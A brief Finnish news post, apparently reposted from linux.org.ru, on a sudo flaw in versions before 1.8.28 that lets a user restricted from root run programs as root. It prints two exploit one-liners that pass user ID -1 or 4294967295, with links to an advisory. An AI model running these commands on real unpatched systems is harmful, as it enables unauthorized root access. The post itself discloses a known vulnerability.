Sudo-vika antaa sinun suorittaa minkä tahansa suoritettavan tiedoston pääkäyttäjänä, jos /etc/sudoers sallii muiden käyttäjien suorittaa sen ja se on kielletty pääkäyttäjälle.
Virheen hyödyntäminen on hyvin yksinkertaista:
sudo -u#-1 id -u
tai:
sudo -u#4294967295 id -u
Virhe esiintyy kaikissa sudon versioissa ennen 1.8.28
Tiedot:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Lähde: linux.org.ru